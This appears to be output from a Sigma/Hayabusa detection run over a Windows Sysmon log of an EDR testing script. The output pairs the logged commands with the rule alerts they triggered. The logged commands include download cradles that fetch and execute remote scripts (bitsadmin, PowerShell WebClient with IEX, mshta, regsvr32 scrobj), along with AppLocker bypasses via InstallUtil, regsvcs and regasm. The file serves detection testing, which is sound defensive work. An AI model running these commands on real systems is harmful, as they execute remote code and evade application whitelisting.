+2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell  -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation/win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  /logfile= /LogToConsole=false /U AllTheThings.dll  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: mshta.exe  javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();  :  Path: C:\Windows\System32\mshta.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Mshta JavaScript Execution,,rules/sigma/process_creation/win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: mshta.exe  javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell  -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,PowerShell Download from URL,,rules/sigma/process_creation/win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell  -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe  AllTheThings.dll  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe  /U AllTheThings.dll  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
